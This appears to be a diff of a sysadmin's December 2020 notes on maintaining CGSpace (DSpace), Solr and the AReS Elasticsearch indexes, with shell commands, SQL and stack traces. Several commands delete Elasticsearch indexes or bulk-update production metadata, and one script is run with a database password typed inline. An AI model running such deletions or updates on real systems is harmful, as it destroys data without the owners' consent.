              org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore 'statistics-2016': Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
              +
              org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore 'statistics-2016': Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
               
              • I will migrate all these cores and see if it makes a difference, then probably end up migrating all of them
                  @@ -223,9 +223,9 @@ $ curl -s "http://localhost:8081/solr/statistics
                  • There are apparently 1,700 locks right now:
                  -
                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                  -1739
                  -

                  2020-12-08

                  +
                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                  +1739
                  +

                  2020-12-08

                  • Atmire sent some instructions for using the DeduplicateValuesProcessor
                      @@ -233,7 +233,7 @@ $ curl -s "http://localhost:8081/solr/statistics
                  -
                  Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn't be processed
                  +
                  Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn't be processed
                   com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0, an error occured in the com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor
                           at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
                           at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
                  @@ -341,22 +341,22 @@ Caused by: org.apache.http.TruncatedChunkException: Truncated chunk ( expected s
                   
                  • I can see it in the openrxv-items-final index:
                  -
                  $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*' | json_pp
                  -{
                  -   "_shards" : {
                  -      "failed" : 0,
                  -      "skipped" : 0,
                  -      "successful" : 1,
                  -      "total" : 1
                  -   },
                  -   "count" : 299922
                  -}
                  -
                    +
                    $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*' | json_pp
                    +{
                    +   "_shards" : {
                    +      "failed" : 0,
                    +      "skipped" : 0,
                    +      "successful" : 1,
                    +      "total" : 1
                    +   },
                    +   "count" : 299922
                    +}
                    +
                    $ curl -XDELETE http://localhost:9200/openrxv-items-final
                    -{"acknowledged":true}%
                    +{"acknowledged":true}%
                     
                    • Moayad said he’s working on the harvesting so I stopped it for now to re-deploy his latest changes
                    • I updated Tomcat to version 7.0.107 on CGSpace (linode18), ran all updates, and restarted the server
                    • @@ -371,8 +371,8 @@ $ curl -XDELETE http://localhost:9200/openrxv-items-temp
                  -
                  localhost/dspace63= > SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-[0-9]{2}-*';
                  -

                  2020-12-14

                  +
                  localhost/dspace63= > SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-[0-9]{2}-*';
                  +

                  2020-12-14

                  • The re-harvesting finished last night on AReS but there are no records in the openrxv-items-final index
                      @@ -380,62 +380,62 @@ $ curl -XDELETE http://localhost:9200/openrxv-items-temp
                  -
                  $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*' | json_pp
                  -{
                  -   "count" : 99992,
                  -   "_shards" : {
                  -      "skipped" : 0,
                  -      "total" : 1,
                  -      "failed" : 0,
                  -      "successful" : 1
                  -   }
                  -}
                  -
                    +
                    $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*' | json_pp
                    +{
                    +   "count" : 99992,
                    +   "_shards" : {
                    +      "skipped" : 0,
                    +      "total" : 1,
                    +      "failed" : 0,
                    +      "successful" : 1
                    +   }
                    +}
                    +
                    • I’m going to try to clone the temp index to the final one…
                      • First, set the openrxv-items-temp index to block writes (read only) and then clone it to openrxv-items-final:
                    -
                    $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                    -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
                    -{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final"}
                    -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                    -
                      +
                      $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                      +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
                      +{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final"}
                      +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                      +
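The three `curl` calls above follow a fixed order: block writes on the source index, clone it, then unblock writes. A minimal sketch that only builds those requests as data, without sending them, might look like this; the function name `clone_index_steps` and the `base_url` default are assumptions for illustration.

```python
import json


def clone_index_steps(source, target, base_url="http://localhost:9200"):
    """Return the (method, url, body) requests for cloning source to target."""
    settings_url = f"{base_url}/{source}/_settings"
    block = json.dumps({"settings": {"index.blocks.write": True}})
    unblock = json.dumps({"settings": {"index.blocks.write": False}})
    return [
        # 1. Make the source index read-only so it can be cloned
        ("PUT", settings_url, block),
        # 2. Clone the source index to the target name
        ("POST", f"{base_url}/{source}/_clone/{target}", None),
        # 3. Allow writes on the source index again
        ("PUT", settings_url, unblock),
    ]
```

Calling `clone_index_steps("openrxv-items-temp", "openrxv-items-final")` yields the same URLs and JSON bodies as the commands in these notes; an HTTP client of your choice would still need to send them with a `Content-Type: application/json` header.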
                      • Now I see that the openrxv-items-final index has items, but there are still none in the AReS Explorer UI!
                      -
                      $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                      -{
                      -  "count" : 99992,
                      -  "_shards" : {
                      -    "total" : 1,
                      -    "successful" : 1,
                      -    "skipped" : 0,
                      -    "failed" : 0
                      -  }
                      -}
                      -
                        +
                        $ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                        +{
                        +  "count" : 99992,
                        +  "_shards" : {
                        +    "total" : 1,
                        +    "successful" : 1,
                        +    "skipped" : 0,
                        +    "failed" : 0
                        +  }
                        +}
                        +
                        • The api logs show this from last night after the harvesting:
                        -
                        [Nest] 92   - 12/13/2020, 1:58:52 PM   [HarvesterService] Starting Harvest
                        -[Nest] 92   - 12/13/2020, 10:50:20 PM   [FetchConsumer] OnGlobalQueueDrained
                        -[Nest] 92   - 12/13/2020, 11:00:20 PM   [PluginsConsumer] OnGlobalQueueDrained
                        -[Nest] 92   - 12/13/2020, 11:00:20 PM   [HarvesterService] reindex function is called
                        -(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
                        -    at IncomingMessage.<anonymous> (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
                        -    at IncomingMessage.emit (events.js:326:22)
                        -    at endReadableNT (_stream_readable.js:1223:12)
                        -    at processTicksAndRejections (internal/process/task_queues.js:84:21)
                        -
                          +
                          [Nest] 92   - 12/13/2020, 1:58:52 PM   [HarvesterService] Starting Harvest
                          +[Nest] 92   - 12/13/2020, 10:50:20 PM   [FetchConsumer] OnGlobalQueueDrained
                          +[Nest] 92   - 12/13/2020, 11:00:20 PM   [PluginsConsumer] OnGlobalQueueDrained
                          +[Nest] 92   - 12/13/2020, 11:00:20 PM   [HarvesterService] reindex function is called
                          +(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
                          +    at IncomingMessage.<anonymous> (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
                          +    at IncomingMessage.emit (events.js:326:22)
                          +    at endReadableNT (_stream_readable.js:1223:12)
                          +    at processTicksAndRejections (internal/process/task_queues.js:84:21)
                          +
                          • But I’m not sure why the frontend doesn’t show any data despite there being documents in the index…
                          • I talked to Moayad and he reminded me that OpenRXV uses an alias to point to temp and final indexes, but the UI actually uses the openrxv-items index
                          • I cloned the openrxv-items-final index to the openrxv-items index and now I see items in the explorer UI
                          • The PDF report was broken and I looked in the API logs and saw this:
                          -
                          (node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
                          -    at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
                          -    at processTicksAndRejections (internal/process/task_queues.js:97:5)
                          -
                            +
                            (node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
                            +    at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
                            +    at processTicksAndRejections (internal/process/task_queues.js:97:5)
                            +
                            • I installed unoconv in the backend api container and now it works… but I wonder why this changed…
                            • Skype with Abenet and Peter to discuss AReS that will be shown to ILRI scientists this week
                                @@ -457,11 +457,11 @@ $ curl -X PUT "localhost:9200/openrxv-items-temp
                            -
                            $ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=0' | json_pp > /tmp/policy1.json
                            -$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=100' | json_pp > /tmp/policy2.json
                            -$ query-json '.items | length' /tmp/policy1.json
                            +
                            $ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=0' | json_pp > /tmp/policy1.json
                            +$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=100' | json_pp > /tmp/policy2.json
                            +$ query-json '.items | length' /tmp/policy1.json
                             100
                            -$ query-json '.items | length' /tmp/policy2.json
                            +$ query-json '.items | length' /tmp/policy2.json
                             32
                             
                          -
                          $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                          -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
                          -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                          -

                          2020-12-15

                          +
                          $ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                          +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
                          +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                          +

                          2020-12-15

                          • After the re-harvest last night there were 200,000 items in the openrxv-items-temp index again
                              @@ -499,36 +499,36 @@ $ curl -X PUT "localhost:9200/openrxv-items-temp
                            • I checked the 1,534 fixes in OpenRefine (had to fix a few UTF-8 errors, as always from Peter’s CSVs) and then applied them using the fix-metadata-values.py script:
                            -
                            $ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                            -$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
                            -
                              +
                              $ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                              +$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
                              +
                              • Since I was re-indexing Discovery anyway I decided to check for any AGROVOC terms containing uppercase letters and lowercase them:
                              -
                              dspace=# BEGIN;
                              -BEGIN
                              -dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
                              -UPDATE 406
                              -dspace=# COMMIT;
                              -COMMIT
                              -
                                +
                                dspace=# BEGIN;
                                +BEGIN
                                +dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
                                +UPDATE 406
                                +dspace=# COMMIT;
                                +COMMIT
                                +
                                • I also updated the Font Awesome icon classes for version 5 syntax:
                                -
                                dspace=# BEGIN;
                                -dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-rss','fas fa-rss', 'g') WHERE text_value LIKE '%fa fa-rss%';
                                -UPDATE 74
                                -dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-at','fas fa-at', 'g') WHERE text_value LIKE '%fa fa-at%';
                                -UPDATE 74
                                -dspace=# COMMIT;
                                -
                                  +
                                  dspace=# BEGIN;
                                  +dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-rss','fas fa-rss', 'g') WHERE text_value LIKE '%fa fa-rss%';
                                  +UPDATE 74
                                  +dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-at','fas fa-at', 'g') WHERE text_value LIKE '%fa fa-at%';
                                  +UPDATE 74
                                  +dspace=# COMMIT;
                                  +
                                  • Then I started a full Discovery re-index:
                                  -
                                  $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
                                  -$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                  -
                                  -real    265m11.224s
                                  -user    171m29.141s
                                  -sys     2m41.097s
                                  -
                                    +
                                    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
                                    +$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                    +
                                    +real    265m11.224s
                                    +user    171m29.141s
                                    +sys     2m41.097s
                                    +
                                    • Udana sent a report that the WLE approver is experiencing the same issue Peter highlighted a few weeks ago: they are unable to save metadata edits in the workflow
                                    • Yesterday Atmire responded about the owningComm and owningColl duplicates in Solr saying they didn’t see any anymore…
                                        @@ -544,31 +544,31 @@ sys 2m41.097s
                                        • After the Discovery re-indexing finished on CGSpace I prepared to start re-harvesting AReS by making sure the openrxv-items-temp index was empty and that the backup index I made yesterday was still there:
                                        -
                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                        -{
                                        -  "acknowledged" : true
                                        -}
                                        -$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                        -{
                                        -  "count" : 0,
                                        -  "_shards" : {
                                        -    "total" : 1,
                                        -    "successful" : 1,
                                        -    "skipped" : 0,
                                        -    "failed" : 0
                                        -  }
                                        -}
                                        -$ curl -s 'http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&pretty'
                                        -{
                                        -  "count" : 99992,
                                        -  "_shards" : {
                                        -    "total" : 1,
                                        -    "successful" : 1,
                                        -    "skipped" : 0,
                                        -    "failed" : 0
                                        -  }
                                        -}
                                        -

                                        2020-12-16

                                        +
                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                        +{
                                        +  "acknowledged" : true
                                        +}
                                        +$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                        +{
                                        +  "count" : 0,
                                        +  "_shards" : {
                                        +    "total" : 1,
                                        +    "successful" : 1,
                                        +    "skipped" : 0,
                                        +    "failed" : 0
                                        +  }
                                        +}
                                        +$ curl -s 'http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&pretty'
                                        +{
                                        +  "count" : 99992,
                                        +  "_shards" : {
                                        +    "total" : 1,
                                        +    "successful" : 1,
                                        +    "skipped" : 0,
                                        +    "failed" : 0
                                        +  }
                                        +}
                                        +

                                        2020-12-16

                                        • The harvesting on AReS finished last night so this morning I manually cloned the openrxv-items-temp index to openrxv-items
                                            @@ -576,32 +576,32 @@ $ curl -s 'http://localhost:9200/openrxv-items-2
                                        -
                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                        -{
                                        -  "count" : 100046,
                                        -  "_shards" : {
                                        -    "total" : 1,
                                        -    "successful" : 1,
                                        -    "skipped" : 0,
                                        -    "failed" : 0
                                        -  }
                                        -}
                                        -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                        -$ curl -s -X POST "http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty"
                                        -$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
                                        -{
                                        -  "count" : 100046,
                                        -  "_shards" : {
                                        -    "total" : 1,
                                        -    "successful" : 1,
                                        -    "skipped" : 0,
                                        -    "failed" : 0
                                        -  }
                                        -}
                                        -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                        -
                                          +
                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                          +{
                                          +  "count" : 100046,
                                          +  "_shards" : {
                                          +    "total" : 1,
                                          +    "successful" : 1,
                                          +    "skipped" : 0,
                                          +    "failed" : 0
                                          +  }
                                          +}
                                          +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
                                          +$ curl -s -X POST "http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty"
                                          +$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
                                          +{
                                          +  "count" : 100046,
                                          +  "_shards" : {
                                          +    "total" : 1,
                                          +    "successful" : 1,
                                          +    "skipped" : 0,
                                          +    "failed" : 0
                                          +  }
                                          +}
                                          +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
                                          +
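The count checks before and after the clone can be automated. This is a minimal sketch, not part of OpenRXV: the helper names `es_count_from_json` and `counts_match` are hypothetical, and the parsing assumes the `_count` response contains a single numeric `"count"` key, as in the output above.

```shell
# Sketch only: helper names are hypothetical, not part of OpenRXV or Elasticsearch.

# Extract the integer "count" value from an Elasticsearch _count response on stdin.
es_count_from_json() {
    sed -n 's/.*"count"[[:space:]]*:[[:space:]]*\([0-9][0-9]*\).*/\1/p' | head -n 1
}

# Succeed only when both counts are non-empty and equal.
counts_match() {
    [ -n "$1" ] && [ "$1" = "$2" ]
}

# Example usage against a live cluster (not run here):
#   temp=$(curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty' | es_count_from_json)
#   items=$(curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty' | es_count_from_json)
#   counts_match "$temp" "$items" && echo "counts agree, temp index can be deleted"
```

Comparing the two counts before deleting `openrxv-items-temp` guards against removing the only complete copy if the clone did not finish.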
                                          • Interestingly the item that we noticed was duplicated now only appears once
                                          • The missing item is still missing
                                          • Jane Poole noticed that the “previous page” and “next page” buttons are not working on AReS
                                          @@ -611,24 +611,24 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                          • Generate a list of submitters and approvers active in the last few months (June to December 2020) using the Provenance field on CGSpace:
                                          -
                                          $ psql -h localhost -U postgres dspace -c "SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-(06|07|08|09|10|11|12)-*'" > /tmp/provenance.txt
                                          -$ grep -o -E 'by .*)' /tmp/provenance.txt | grep -v -E "( on |checksum)" | sed -e 's/by //' -e 's/ (/,/' -e 's/)//' | sort | uniq > /tmp/recent-submitters-approvers.csv
                                          -
                                            +
                                            $ psql -h localhost -U postgres dspace -c "SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-(06|07|08|09|10|11|12)-*'" > /tmp/provenance.txt
                                            +$ grep -o -E 'by .*)' /tmp/provenance.txt | grep -v -E "( on |checksum)" | sed -e 's/by //' -e 's/ (/,/' -e 's/)//' | sort | uniq > /tmp/recent-submitters-approvers.csv
                                            +
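The extraction step can be tried on sample provenance text without a database. This is a sketch of an alternative to the pipeline above, not the same command: the function name `extract_submitters` is hypothetical, and the pattern matches only the first `by Name (email)` pair rather than matching greedily and then filtering out lines containing ` on ` or `checksum`.

```shell
# Sketch only: extract_submitters is a hypothetical helper name.
# Reads provenance text on stdin and prints unique "Name,email" lines.
extract_submitters() {
    grep -o -E 'by [^()]+ \([^()]+\)' \
        | sed -e 's/^by //' -e 's/ (/,/' -e 's/)$//' \
        | sort -u
}

# Example usage with the file produced by the psql command (not run here):
#   extract_submitters < /tmp/provenance.txt > /tmp/recent-submitters-approvers.csv
```

Because the pattern excludes parentheses inside the name and the email address, trailing text such as a timestamp followed by `(GMT)` does not end up in the match.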
                                            • Peter wanted the list so he could send some mail to the users…

                                            2020-12-17

                                            • I see some errors from CUA in our Tomcat logs:
                                            -
                                            Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
                                            -Error while updating
                                            -java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
                                            -        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
                                            -        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
                                            -        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
                                            -        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
                                            -...
                                            -
                                              +
                                              Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
                                              +Error while updating
                                              +java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
                                              +        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
                                              +        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
                                              +        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
                                              +        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
                                              +...
                                              +
                                              • I sent the full stack to Atmire to investigate
                                                • I know we’ve had this “Multiple update components target the same field” error in the past with DSpace 5.x and Atmire said it was harmless, but would nevertheless be fixed in a future update
                                                @@ -636,39 +636,39 @@ java.lang.UnsupportedOperationException: Multiple update components target the s
                                                • I was trying to export the ILRI community on CGSpace so I could update one of the ILRI author’s names, but it throws an error…
                                                -
                                                $ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
                                                -Loading @mire database changes for module MQM
                                                -Changes have been processed
                                                -Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
                                                -           Exception: null
                                                -java.lang.NullPointerException
                                                -        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
                                                -        at com.google.common.collect.Iterators.concat(Iterators.java:464)
                                                -        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
                                                -        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
                                                -        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
                                                -        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                -
                                                  +
                                                  $ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
                                                  +Loading @mire database changes for module MQM
                                                  +Changes have been processed
                                                  +Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
                                                  +           Exception: null
                                                  +java.lang.NullPointerException
                                                  +        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
                                                  +        at com.google.common.collect.Iterators.concat(Iterators.java:464)
                                                  +        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
                                                  +        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
                                                  +        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
                                                  +        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                  +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                  +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                  +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                  +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                  +
                                                  • I did it via CSV with fix-metadata-values.py instead:
                                                  -
                                                  $ cat 2020-12-17-update-ILRI-author.csv
                                                  -dc.contributor.author,correct
                                                  -"Padmakumar, V.P.","Varijakshapanicker, Padmakumar"
                                                  -$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                                                  -
                                                    +
                                                    $ cat 2020-12-17-update-ILRI-author.csv
                                                    +dc.contributor.author,correct
                                                    +"Padmakumar, V.P.","Varijakshapanicker, Padmakumar"
                                                    +$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
                                                    +
                                                    • Abenet needed a list of all 2020 outputs from the Livestock CRP that were Limited Access
                                                      • I exported the community from CGSpace and used csvcut and csvgrep to get a list:
                                                    -
                                                    $ csvcut -c 'dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]' ~/Downloads/10568-80099.csv | csvgrep -c 'cg.identifier.status[en_US]' -m 'Limited Access' | csvgrep -c 'dc.date.issued' -m 2020 -c 'dc.date.issued[]' -m 2020 -c 'dc.date.issued[en_US]' -m 2020 > /tmp/limited-2020.csv
                                                    +
                                                    $ csvcut -c 'dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]' ~/Downloads/10568-80099.csv | csvgrep -c 'cg.identifier.status[en_US]' -m 'Limited Access' | csvgrep -c 'dc.date.issued' -m 2020 -c 'dc.date.issued[]' -m 2020 -c 'dc.date.issued[en_US]' -m 2020 > /tmp/limited-2020.csv
                                                     

                                                    2020-12-18

                                                    • I added support for indexing community views and downloads to dspace-statistics-api
                                                    @@ -689,43 +689,43 @@ $ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u ds
                                                      • The DeduplicateValuesProcessor has been running on DSpace Test for two days and had almost completed its second twelve-hour run when it crashed near the end:
                                                      -
                                                      ...
                                                      -Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
                                                      -Exception: Java heap space
                                                      -java.lang.OutOfMemoryError: Java heap space
                                                      -        at java.util.Arrays.copyOfRange(Arrays.java:3664)
                                                      -        at java.lang.String.<init>(String.java:207)
                                                      -        at org.noggit.CharArr.toString(CharArr.java:164)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
                                                      -        at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
                                                      -        at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
